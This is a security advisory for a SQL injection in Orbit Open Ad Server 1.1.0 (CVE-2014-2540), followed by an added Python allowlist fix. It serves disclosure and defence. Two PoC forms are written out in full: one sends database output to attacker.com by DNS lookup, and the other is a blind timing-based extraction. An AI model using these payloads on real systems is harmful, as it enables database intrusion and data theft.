Advisory ID: HTB23208
Product: Orbit Open Ad Server
Vendor: OrbitScripts, LLC
Vulnerable Version(s): 1.1.0 and probably prior
Tested Version: 1.1.0
Advisory Publication: March 19, 2014 [without technical details]
Vendor Notification: March 19, 2014
Vendor Patch: March 21, 2014
Public Disclosure: April 9, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-2540
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to the database of the vulnerable application and potentially gain control over the vulnerable website.
1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540
Input passed via the "site_directory_sort_field" HTTP POST parameter to the "/guest/site_directory" URL is not properly sanitised before being used in an SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.
The PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):
<form action="http://[host]/guest/site_directory" method="post" name="main">
<input type="hidden" name="active_form" value="site_directory_form">
<input type="hidden" name="ad_type_filter" value="text">
<input type="hidden" name="category_filter" value="1">
<input type="hidden" name="cost_model_filter" value="cpm">
<input type="hidden" name="form_mode" value="save">
<input type="hidden" name="image_size_filter" value="12">
<input type="hidden" name="keyword_filter" value="1">
<input type="hidden" name="site_directory_page" value="1">
<input type="hidden" name="site_directory_per_page" value="10">
<input type="hidden" name="site_directory_sort_direction" value="asc">
<input type="hidden" name="site_directory_sort_field" value="(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))">
<input type="submit" id="btn">
</form>
The second PoC code works against any platform (UNIX/Windows) and uses the blind SQL injection brute-force (dichotomy) technique to extract data from the database:
<form action="http://[host]/guest/site_directory" method="post" name="main">
<input type="hidden" name="active_form" value="site_directory_form">
<input type="hidden" name="ad_type_filter" value="text">
<input type="hidden" name="category_filter" value="1">
<input type="hidden" name="cost_model_filter" value="cpm">
<input type="hidden" name="form_mode" value="save">
<input type="hidden" name="image_size_filter" value="12">
<input type="hidden" name="keyword_filter" value="1">
<input type="hidden" name="site_directory_page" value="1">
<input type="hidden" name="site_directory_per_page" value="10">
<input type="hidden" name="site_directory_sort_direction" value="asc">
<input type="hidden" name="site_directory_sort_field" value="(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))">
<input type="submit" id="btn">
</form>
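The root cause above is a sort-field name spliced into the query text. As an added defensive example (not code from the advisory or from the vendor), this is the standard fix for an unsanitised ORDER BY parameter: map the user-supplied sort field and direction through an allowlist of fixed SQL fragments and bind everything else; the table, column names and sample rows are assumptions for illustration, and the two payloads are shaped like the advisory's PoCs.

```python
import sqlite3

# Allowlist of exposed sort keys -> real column names (schema is assumed here,
# not the product's real one). Anything not in this map is refused outright.
SORT_FIELDS = {
    "site_name": "site_name",
    "category": "category_id",
    "cost": "cost_per_mille",
}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_order_by(sort_field: str, sort_direction: str) -> str:
    """Return a fixed ORDER BY fragment or raise ValueError.

    Identifiers cannot be bound as query parameters, so the only safe option
    is an exact allowlist lookup; the user string never reaches the SQL text.
    """
    try:
        column = SORT_FIELDS[sort_field]
        direction = SORT_DIRECTIONS[sort_direction.lower()]
    except KeyError:
        raise ValueError("unsupported sort field or direction") from None
    return f"ORDER BY {column} {direction}"


def list_sites(conn, sort_field, sort_direction, per_page):
    """Site directory query: allowlisted ORDER BY plus a bound LIMIT value."""
    sql = f"SELECT site_name FROM sites {build_order_by(sort_field, sort_direction)} LIMIT ?"
    return [row[0] for row in conn.execute(sql, (int(per_page),))]


def demo_db():
    """Constructed in-memory sample data standing in for the ad server tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sites (site_name TEXT, category_id INTEGER, cost_per_mille REAL)")
    conn.executemany("INSERT INTO sites VALUES (?, ?, ?)",
                     [("news.example", 1, 2.5), ("blog.example", 2, 0.9), ("shop.example", 1, 4.0)])
    return conn


# Payloads in the shape of the advisory's two PoCs; both must be rejected.
DNS_EXFIL_PAYLOAD = "(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46))))"
BLIND_PAYLOAD = "(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))"

if __name__ == "__main__":
    conn = demo_db()
    print(list_sites(conn, "cost", "desc", 10))
    for payload in (DNS_EXFIL_PAYLOAD, BLIND_PAYLOAD):
        try:
            build_order_by(payload, "asc")
        except ValueError as err:
            print("rejected:", err)
```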
-----------------------------------------------------------------------------------------------
Solution:
Update to Orbit Open Ad Server 1.1.1
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23208 - https://www.htbridge.com/advisory/HTB23208 - SQL Injection in Orbit Open Ad Server.
[2] Orbit Open Ad Server - http://orbitopenadserver.com/ - the free, open source ad tool that lets you manage the profits while we manage the technology.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.